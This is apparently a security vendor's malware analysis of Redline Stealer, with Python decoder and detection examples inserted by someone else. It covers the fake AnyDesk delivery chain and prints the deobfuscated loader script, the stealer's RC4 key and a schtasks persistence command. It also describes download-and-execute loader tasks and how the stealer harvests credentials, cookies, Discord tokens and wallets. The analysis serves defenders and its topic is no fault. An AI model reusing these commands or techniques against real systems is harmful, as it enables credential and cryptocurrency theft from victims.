Redline Stealer is one of the most popular stealers being sold and used by cybercriminals. The command and control (C2) panel does not require an attacker to log in via the Web UI; everything can be managed via the Redline client on the attacker’s virtual private server (VPS). The functionality of the stealer contains multiple capabilities including obfuscation, which makes it easy for attacker(s) to manage.
This malware analysis delves deeper into the technical details of how the Redline Stealer malware operates and our security recommendations to protect your organization from being exploited.
Key Takeaways
- Redline Stealer is mostly being distributed via fake software. Attacker(s) also use YouTube and/or other third-party advertising platforms to spread the stealer.
- Attacker(s) use an AutoIt wrapper and various crypting services to obfuscate the stealer binary.
- Redline comes with loader tasks that allow an attacker to perform various actions on the infected host including file download, process injection and command execution.
- Redline uses Windows Communication Foundation (WCF) with NetTCPBinding for C2 communication.
- Redline Stealer does not exfiltrate logs from Commonwealth of Independent States (CIS) countries.
Case Study
eSentire’s Threat Response Unit (TRU) has observed Redline Stealer being distributed as a fake AnyDesk installer. The landing page of the malicious website is identical to the legitimate AnyDesk website (Figures 1-2).
The fake AnyDesk installer comes in an ISO image file and is 312MB in size. Padding the binary with junk hex bytes to inflate its size is a common practice for stealers, since some sandboxes and antivirus engines have file size limits. The infection chain is shown in Figure 3.
The AnyDesk binary contains the cabinet file within RCData (Figure 4). The extracted cabinet file contains the following:
- Imagine.potm (cb8603e18dca2737e3d96303ce11977d)
- Ritornata.potm (eed2bf43d57a34bb01e3a313e780febb)
- Saputo.potm (3139d6dc3c8632c9e8081339cf828d83)
The AnyDesk binary contains the section POSTRUNPROGRAM with the command cmd /c cmd < Saputo.potm & ping -n 5 localhost. The command executes the obfuscated Saputo.potm file and then pings localhost five times, which serves as a roughly 5-second sleep so the obfuscated file can finish running.
The deobfuscated Saputo.potm file is shown below:
tasklist /FI "imagename eq PSUAService.exe" 2>NUL | find /I /N "psuaservice.exe">NUL
if not errorlevel 1
Set pEoQCZpLBzfzlhEvxHCjS=autoit.exe
<nul set /p = "ZcDpijTWATBmXUDhlfiobLGsqbhgrZ" > pEoQCZpLBzfzlhEvxHCjS
MrKXuUkCoPoGpMSbrwAewuXYoFFLRDZyqNxindstr /V /R "^YbeRstbFtOUDIqBrtdMHJUtzjhOkoKZFTdVtvyDmPFkahUrGQWaXBcArzIFrfkvxPgKsybGZNhRtJLyalocksetbQRLOA$" Ritornata.potm >> pEoQCZpLBzfzlhEvxHCjS
ZcDpijTWATBmXUDhlfiobLGsqbhgrove Imagine.* t
pEoQCZpLBzfzlhEvxHCjS t
ping localhost -n 5
The script looks for PSUAService.exe on the infected system, which is a part of Panda Cloud Antivirus Software. If the mentioned antivirus is not present on the system, the malware will execute the main payload with the renamed AutoIt tool.
Imagine.potm contains the obfuscated AutoIt script in which Redline Stealer resides. The Redline binary embedded within the obfuscated AutoIt script is shown in Figure 6.
The RC4 key used to decode the script is built from a string of decimal values, each of which is subtracted by 2, as shown below (snippet of the obfuscated AutoIt script):
$jnpcgiMxrEdJ = zRAVrukiOcYK(mygFPnMUDEBWrobGzyl(mwKlCHGodCtOveXOxogMpp(Binary($uSDnetQy), Binary(TtmigjRVnUPf("59[53[51[58[53[53[56[53[58[59",2)))), $UkyGgZA, $XUeaTHbWBqM)
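As an added example (not code from the original post or from the stealer), the following Python reproduces the key recovery described above so an analyst can decode a dumped script body offline: each "["-separated decimal value is decremented by 2 and mapped to a character (the character mapping is our reading of the snippet, not stated on the page), and the recovered key drives a standard RC4 routine. The ciphertext in the demo is constructed here.

```python
# Added example: recover the RC4 key from the obfuscated AutoIt snippet
# and decrypt a script body with it. Not the stealer's own code.

def derive_key(encoded: str, delta: int, sep: str = "[") -> str:
    """Split the "59[53[51..." string, subtract `delta` from each value and
    map it to a character. Mapping via chr() after the subtraction is an
    assumption about the wrapper's helper; the page states only the
    subtract-by-2 step."""
    return "".join(chr(int(v) - delta) for v in encoded.split(sep))


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                          # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# Key string copied from the snippet above; 2 is the subtraction constant
# passed as the second argument to the wrapper's helper function.
OBFUSCATED_KEY = "59[53[51[58[53[53[56[53[58[59"
KEY = derive_key(OBFUSCATED_KEY, 2)


def decrypt_script(blob: bytes, key: str = KEY) -> bytes:
    """Decrypt an RC4-protected AutoIt script body with the recovered key."""
    return rc4(key.encode("ascii"), blob)


if __name__ == "__main__":
    # Constructed sample: encrypt a stand-in script body, then decrypt it.
    sample = b'MsgBox(0, "demo", "stand-in for the embedded script")'
    blob = rc4(KEY.encode("ascii"), sample)
    print("recovered key:", KEY)
    print("round trip ok:", decrypt_script(blob) == sample)
```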
The eSentire TRU team has observed that the threat actor(s) have been using the AutoIt wrapper to obfuscate stealers such as Mars Stealer. For a more in-depth analysis, read our blog on Mars Stealer wrapped with AutoIt.
After the binary executes, the files listed in Figure 4 are extracted from the CAB file into an IXPxxx.TMP folder under the %TEMP% path, as shown in Figure 7. A renamed copy of NTDLL.DLL is also dropped into the folder. Loading a fresh copy of NTDLL.DLL at runtime is a known technique used by threat actor(s) to bypass EDR detections; we briefly described it in our Mars Stealer analysis.
An additional folder is created to run a scheduled task from. This is the persistence technique that ensures the infected host periodically communicates with the C2.
The scheduled task creation command line is shown below. The task is named Puoi and runs the z file (the obfuscated AutoIt script containing the stealer) under the %TEMP%\zqNDtAgMrV folder every 3 minutes, using the renamed AutoIt interpreter PJDKIgRDMm.exe.com:
schtasks.exe /create /tn "Puoi" /tr "C:\Users\user\AppData\Local\Temp\zqNDtAgMrV\PJDKIgRDMm.exe.com C:\Users\user\AppData\Local\Temp\zqNDtAgMrV\z" /sc minute /mo 3 /F
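As an added example (not from the original post and not eSentire's detection content), a small Python checker that turns the observations above into rules over process-creation command lines: a schtasks /create whose action runs from a user temp directory, uses a double extension such as .exe.com, and fires every few minutes. The sample lines are constructed for the demo; the first reuses the command shown above.

```python
import re
from dataclasses import dataclass

# Added example: flag schtasks persistence of the kind described above in
# process-creation command lines. Rules and sample lines are constructed
# for this demo.

TEMP_DIR_RE = re.compile(r"%TEMP%|\\AppData\\Local\\Temp\\", re.IGNORECASE)
DOUBLE_EXT_RE = re.compile(r"\.(?:exe|scr|bat|cmd)\.(?:com|exe|scr|pif)\b", re.IGNORECASE)
TASK_RUN_RE = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
SCHEDULE_RE = re.compile(r"/sc\s+(\w+)", re.IGNORECASE)
MODIFIER_RE = re.compile(r"/mo\s+(\d+)", re.IGNORECASE)


@dataclass
class Finding:
    command_line: str
    reasons: list


def suspicious_schtasks_reasons(cmdline: str) -> list:
    """Return why a schtasks /create command line looks like stealer persistence.
    An empty list means no rule fired (not a task creation, or benign)."""
    lowered = cmdline.lower()
    if "schtasks" not in lowered or "/create" not in lowered:
        return []
    reasons = []
    match = TASK_RUN_RE.search(cmdline)
    action = (match.group(1) or match.group(2)) if match else ""
    if TEMP_DIR_RE.search(action):
        reasons.append("task action runs from a user temp directory")
    if DOUBLE_EXT_RE.search(action):
        reasons.append("task action uses a double extension such as .exe.com")
    schedule = SCHEDULE_RE.search(cmdline)
    modifier = MODIFIER_RE.search(cmdline)
    if schedule and schedule.group(1).lower() == "minute":
        every = int(modifier.group(1)) if modifier else 1
        if every <= 5:
            reasons.append(f"task repeats every {every} minute(s), beacon-like persistence")
    return reasons


def scan_command_lines(lines) -> list:
    """Run the rules over a batch of command lines and keep only the hits."""
    findings = []
    for line in lines:
        reasons = suspicious_schtasks_reasons(line)
        if reasons:
            findings.append(Finding(line, reasons))
    return findings


# Constructed sample telemetry: line 1 reuses the command from the analysis,
# lines 2-3 are benign stand-ins.
SAMPLE_COMMAND_LINES = [
    r'schtasks.exe /create /tn "Puoi" /tr "C:\Users\user\AppData\Local\Temp\zqNDtAgMrV\PJDKIgRDMm.exe.com C:\Users\user\AppData\Local\Temp\zqNDtAgMrV\z" /sc minute /mo 3 /F',
    r'schtasks.exe /create /tn "NightlyBackup" /tr "C:\Program Files\Acme\backup.exe" /sc daily /st 02:00',
    r'schtasks.exe /query /tn "NightlyBackup"',
]

if __name__ == "__main__":
    for finding in scan_command_lines(SAMPLE_COMMAND_LINES):
        print(finding.command_line)
        for reason in finding.reasons:
            print("  -", reason)
```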
The deobfuscated binary contains Redline Stealer, which is injected into the jsc.exe process after being decrypted by the renamed AutoIt process, as shown in Figure 7.
The extracted .NET Redline payload is approximately 619KB in size (MD5: ee5c2ec0ec6d2b5b9c2396fb7513f83b), the original filename is Test.exe, and the compilation timestamp is July 24, 2022. Upon opening the file in a debugger, we can see that the stealer performs enumeration on the victim’s machine looking for installed browsers, FTP connections, security tools, software, crypto wallets (Figure 9).
We can also see the stealer collecting credit card (CC) information on the infected host from Chrome browsers (Figure 10).
Redline Stealer Behind The Scenes
Redline Stealer, also known as REDGlade and Glade, first appeared on hacking forums in February 2020 (Figure 11). Redline was allegedly written based on feedback from people involved in carding, the term for the unauthorized use of credit cards.
Similar to Raccoon Stealer, Redline requires a dedicated VPS (Virtual Private Server) to host the panel. The stealer can be easily bought via a Telegram Bot (Figure 12) using cryptocurrency as the payment method. The price for Redline is $150USD per month and $900USD for lifetime access. Upon purchasing Redline, the user gets a link to the private chat in Telegram. At the time of this analysis, roughly 400 members were part of the Telegram group. Based on a review of the chats, native Russian speakers were the most active. After the subscription expires, the user is removed from the private chat.
Redline Stealer capabilities include:
- Grabbing cookies, autofill, credit cards, login, and passwords from browsers.
- Supported browsers: Microsoft Edge, all Chromium-based browsers including the latest version of Chrome, all Gecko-based browsers including Mozilla Firefox
- Grabbing FTP and Instant Messaging clients’ passwords.
- Behaving as a Loader malware so it can be used as a vehicle to load additional malware to the network (e.g., ransomware).
- Enabling the adversary to choose which country the stealer can grab the logs from and add certain countries to the blacklist.
- Gathering system information on the infected host including IP, country, processor information, username, HWID, keyboard layout, screenshot, Operating System, UAC (User Account Control) settings, installed antiviruses.
- Extracting VPN credentials including NordVPN, OpenVPN and ProtonVPN.
- Extracting Steam, Discord and Telegram data.
- Extracting crypto wallets.
- List of supported crypto wallets: Bitcoin, Litecoin, 42Coin, Atomic, Alphacoin, Americancoin, AndroidsTokens, Anoncoin, Argentum, AsicCoin, avingCoin, BBQCoin, BeaoCoin, BitBar, bitgem, bits, Blakecoin, Bottlecaps, BountyCoin, Bytecoin, CasinoCoin, CHNCoin, Cloudcoin, Coinomi, Colossuscoin, Copper Bars, CosmosCoin, CPU2coin, Craftcoin, Crimecoin, CryptogenicBullion, CryptogenicBullionC, Devcoin, Diamond, DigitalCoin, Dogecoin, DollarPounds, Dragoncoin, EagleCoin, Earthcoin, ElephantCoin, Electrum, Exodus, Ethereum, Extremecoin, EzCoin, Fastcoin, FeatherCoin, FerretCoin, Florincoin, Franko, FrankoCoin, FreeCoin, Freicoin, Galaxycoin, Gamecoin, Guarda, GlobalCoin, Goldcoin, Grain, GrandCoin, Growthcoin, HoboNickels, infinitecoin, ItalyCoin, Ixcoin, Joulecoin, Jaxx, Jupitercoin, KingCoin, krugercoin, last Coin, Lebowskis, Liquidcoin, Lucky7Coin, LuckyCoin, Maples, mastercoin, MasterCoin, Mavro, Megacoin, MEMEcoin, MemoryCoin, Monero, Mincoin, NaanaYaM, Namecoin, NanoTokens, Neocoin, NetCoin, NovaCoin, Nuggets, NXTCoin, Onecoin, OpenSourcecoin, Orbitcoin, Paycoin, PEERCoin, Pennies, PeopleCoin, PhenixCoin, Philosopherstone, PlayToken, PPcoin, PrimeCoin, ProtoShares, ProtoSharesCoin, QuarkCoin, RealCoin, Redcoin, RichCoin, RoyalCoin, Sauron Rings, Secondscoin, SecureCoin, Sexcoin, SHITcoin, Sifcoin, Skycoin, Spots, supercoin, TagCoin, TEKcoin, Terracoin, TicketsCoin, tumcoin, UnitedScryptCoin, Unobtanium, UScoin, ValueCoin, Worldcoin, Waves, XenCoin, YACoin, Ybcoin, ZcCoin, ZenithCoin, Zetacoin.
What makes Redline Stealer popular is that the control panel is quite easy to navigate through; once the user buys the stealer, they get the detailed instructions in English and Russian on Redline functionality and installation steps (Figure 13).
It is worth noting that there are a number of fake Redline sellers on Telegram who profit by luring those interested in acquiring Redline Stealer, scamming them by taking their money, and not providing Redline in exchange. Upon purchasing a Redline subscription, the user gets the link to the private Telegram chat and the request to access chat must be approved by the administrator.
The Redline panel (Figure 14) is easy to navigate through and contains the following sections:
- Logs – displays information about the infected hosts such as HWID, IP addresses, the build ID of the stealer used, countries, and the number of captured credentials.
- Statistic panel – displays the amount of stolen information on hosts, the top 10 OS (Operating Systems), antiviruses, and countries (Figure 14).
- Advertisement panel – shows the links to third-party service providers (Figure 15).
- Guest Links – used for users who spread the stealers via installers or advertisers. We believe that this link is used to build up a statistical panel of the users who visited the malicious landing page that hosts the payload.
- Loader Tasks – contains interesting features allowing an attacker to load additional payloads to the infected machine (Figure 16), such as:
  - Download – downloads the payload via the direct link to the specified folder.
  - DownloadAndEx – downloads the payload via the direct link to the specified folder and executes it (e.g., https://example.com/payload.ex…filename.exe).
  - OpenLink – opens the specified website in the victim’s browser (e.g., https://example.com/payload.ex…).
  - Cmd – command line execution on the victim’s machine.
  - RunPE – receives the payload via the direct link and then launches the file in memory under another process (process injection). The eligible processes are all the executables under the C:\Windows\Microsoft.NET\Framework\v4.0.30319 path (e.g., https://example.com/payload.ex…).
  - “FinalPoint” field – contains the number of successful executions from the tasks specified by an attacker; after reaching the number of executions, the task is considered to be completed. The attacker can include filters for specific Country, IP, OS and BuildID in the “Field” section to perform the tasks on. The “Domain Check” section allows an attacker to look for the presence of specific domains in the passwords extracted from the infected host (e.g., paypal.com | facebook.com).
- Log Sorter – the feature allows the attacker to sort the logs by the country, BuildID, OS, cookies, and passwords by the domain. The attacker can specify what type of logs will be saved to the machine (Figure 17).
- Wallet Checker – allows an attacker to check for the cryptocurrency balance of the stolen crypto wallet.
- Builder – one of the crucial parts of the panel (Figure 18). This is where the attacker specifies the IPs of their servers, the Build ID, generates the stealer payload, signs the file, and obfuscates it if needed. The attacker can also specify the fake error message for the victims when they open the executable.
  - “Send log by parts” allows the attacker to receive the stolen logs in parts, so if the antivirus (AV) flags the stealer during the runtime or right before the launch, the stealer will send everything it was able to collect on the host before the AV jumps in (it is worth noting that this feature is enabled by default on Raccoon Stealer v2).
- Misc – in the Misc section, an attacker can create a clone of the payload and add extra bytes to increase the file size of the payload (antivirus and anti-sandbox evasion technique we have mentioned previously).
- Telegram – in the Telegram section, an attacker can specify their Telegram Bot that is used to receive the logs and notify the attacker on the successful infection by sending the specified logs (Figure 19).
- The Notifications panel contains panel events (e.g., it shows the completed tasks or if there is a duplicate log received).
- Black Lists – the attacker can specify the countries, IPs, HWIDs and build IDs from which the stealer will not exfiltrate data (Figure 20). It’s worth mentioning that all countries in the Commonwealth of Independent States (CIS) are blacklisted automatically; attackers who want stolen logs from CIS countries usually switch to MetaStealer instead, since MetaStealer does not apply the anti-CIS restriction.
- Settings – contains the functionality of the stealer specified by an attacker – the data that needs to be exfiltrated and what folders and domains to search for (Figure 21).
Facebook logs are one of the popular stolen logs being bought on hacking forums (Figures 22-23). The stealer logs that contain cookies can be enticing to cybercriminals. With the cookies, an attacker would be able to bypass two-factor authentication. By using the stolen cookie, the threat actor would be able to authenticate as another user on platforms such as YouTube and Facebook.
Cybercriminals buy stolen Facebook accounts to push malicious advertisements without the user’s knowledge. Spend logs are the accounts where an attacker can spend a certain amount of money to publish their ads per day (Figure 22).
There are numerous services available where attackers can sell their stolen logs. The prices depend on what type of logs they are selling (Figure 24).
Redline logs are also in high demand on dark web markets such as RussianMarket. We can see that compared to other stealers, Redline logs are the most sold by cybercriminals (Figure 25).
It is worth noting that Redline is being distributed not only via cracked or fake software. Other means to distribute Redline are via installers and YouTube traffic (Figure 26). With YouTube traffic, an attacker would create or purchase the channel and upload a short video with the description to lure the user to install the application via the direct link.
The installers push the stealer to third-party advertising networks or platforms. The advertising service displays the ads on different webpages based on the countries that the attacker(s) specify (Figure 27).
More seasoned cybercriminals usually crypt or obfuscate the payload through the well-known crypters in the hacking channels named Mastif and 11. Redline also advertises one of the crypters, named Spectrcrypt or Spectrum Crypt, which comes free with a one-month subscription purchase (Figure 28).
The Redline logs are quite popular for sale on hacker forums and Telegram (Figures 29-30).
Redline Technical Analysis
The non-obfuscated Redline payload is a 32-bit .NET binary, 107 KB in size. The hash of the payload and the original filename change each time the build/payload is generated from the Redline panel.
The Argument class contains the encoded payload configuration for C2 communication including the IP address, Build ID, version and the XOR key used to decrypt the configuration parameters (Figure 31).
Each configuration string is produced by Base64-encoding the plaintext, XOR-ing the result with the hardcoded key “Raves”, and Base64-encoding it again; decoding reverses those steps (Figure 32).
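As an added example (not the stealer's code and not from the original post), a Python decoder for the layering just described, written so an analyst can pull the C2 address and build ID out of a dumped Argument class offline. “Raves” is the key named on the page but changes per build, so it is a parameter; the field names and config values in the demo are constructed placeholders.

```python
import base64

# Added example: undo the string encoding described in the analysis
# (Base64 -> XOR with a repeating key -> Base64). "Raves" is the key named
# on the page; it changes per build, so every function takes it as a parameter.
XOR_KEY = "Raves"


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR every byte with the key, cycling the key as needed."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_redline_string(encoded: str, key: str = XOR_KEY) -> str:
    """Outer Base64 -> XOR -> inner Base64 -> UTF-8 plaintext.
    validate=True on the inner decode makes a wrong key fail loudly instead
    of silently producing garbage."""
    outer = base64.b64decode(encoded)
    inner = xor_repeating(outer, key.encode("ascii"))
    return base64.b64decode(inner, validate=True).decode("utf-8")


def encode_redline_string(plain: str, key: str = XOR_KEY) -> str:
    """Forward direction; used here only to construct demo values."""
    inner = base64.b64encode(plain.encode("utf-8"))
    return base64.b64encode(xor_repeating(inner, key.encode("ascii"))).decode("ascii")


def decode_config(fields: dict, key: str = XOR_KEY) -> dict:
    """Decode every configuration field in one pass; a value that does not
    decode under this key (wrong key, not an encoded field) maps to None."""
    decoded = {}
    for name, value in fields.items():
        try:
            decoded[name] = decode_redline_string(value, key)
        except (ValueError, UnicodeDecodeError):
            decoded[name] = None
    return decoded


if __name__ == "__main__":
    # Constructed sample config: field names follow the parameters the page
    # lists (IP, build ID, version); the values are placeholders, not a real build.
    sample_plain = {"IP": "192.0.2.10:1912", "BuildID": "demo_build", "Version": "demo"}
    sample_encoded = {k: encode_redline_string(v) for k, v in sample_plain.items()}
    print("encoded:", sample_encoded)
    print("decoded:", decode_config(sample_encoded))
```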
Under Entity16, the stealer enumerates the Login Data, Web Data, Cookies folders for Chrome and Opera GX Stable. It also searches for crypto wallet browser extensions under Local Extension Settings folders for Chrome (Figure 33).
The list of targeted crypto wallet extensions is decoded from a Base64-encoded blob; each entry pairs a Chrome extension ID with the wallet name (YoroiWallet, Tronlink, Metamask, Coinbase, Phantom and others).
Entity15 is likely used for performing the loader tasks (Figure 34).
The ConfigReader class looks for crypto wallets in the folders specified by an attacker in settings. Entity17 contains the information on crypto wallets. Entity16 stores the path to crypto wallets (Figure 35).
ConnectionProvider class contains the C2 communication method used in Redline. Communication with the C2 server is established via Windows Communication Foundation (WCF) with NetTCPBinding. The WCF TCP transport utilizes the net.tcp:// protocol. The destination port is specified by an attacker (Figure 36).
Figure 37 shows example C2 traffic generated by a workstation infected with Redline, containing the stealer configuration, C2 IP, host information and files residing on the host; tempuri[.]org is the default WCF namespace and should not be considered the only indicator of a Redline compromise.
Entity5 gathers Discord tokens from .log and .db files under the AppData\Roaming\discord\Local Storage\leveldb path (Figure 38). Redline harvests Discord tokens because a token alone bypasses Two Factor Authentication (2FA) and grants access to the account without credentials; nothing beyond the token is needed. For detection evasion purposes, Redline inserts random words into its strings and strips them again at runtime.
Entity6 contains the module responsible for launching the loader tasks DownloadAndEx and Download (Figure 39).
Entity8, 10, 11 and 12 within the EntityCreator class scan for autofills, cookies, credentials, and credit cards respectively (Figure 40). The credentials are then decrypted in the EntityReader class.
Previously, we mentioned that Redline stealer does not exfiltrate logs from CIS countries. The stealer checks for the local time zone of the infected machine and the default user interface language for the presence of languages used by CIS countries (Figure 41).
PartsSender class contains all the information (logs) that are sent to the attacker including user’s system information, files, wallets, credentials, and screenshot (Figure 42).
The Redline developers cleverly named the Telegram stealing module RosComNadzor (The Federal Service for Supervision of Communications, Information Technology and Mass Media).
Finally, SystemInfoHelper class (Figure 43) gathers the user’s system information, list of processes, browsers, installed programs, and sends them to the attacker as text files (Figures 44-45).
How eSentire is Responding
Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create practical outcomes for our customers. We are taking a comprehensive response approach to combat modern cybersecurity threats by deploying countermeasures, such as:
- Implementing threat detections to identify malicious command execution and ensure that eSentire has visibility and detections are in place across eSentire MDR for Endpoint and esNetwork.
- Performing global threat hunts for indicators associated with Redline Stealer.
Our detection content is supported by investigation runbooks, ensuring our team of 24/7 SOC Cyber Analysts respond rapidly to any intrusion attempts related to known malware Tactics, Techniques, and Procedures (TTPs). In addition, TRU closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.
Recommendations from eSentire’s Threat Response Unit (TRU)
We recommend implementing the following controls to help secure your organization against the Redline Stealer malware:
While the TTPs used by threat actor(s) grow in sophistication, they create difficulties at which critical business decisions must be made. Preventing the various attack techniques and tactics utilized by the modern threat actor requires actively monitoring the threat landscape, developing and deploying endpoint detections, and the ability to investigate logs and network data during active intrusions.
eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.
If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.
Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.
Appendix
Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-redline-stealer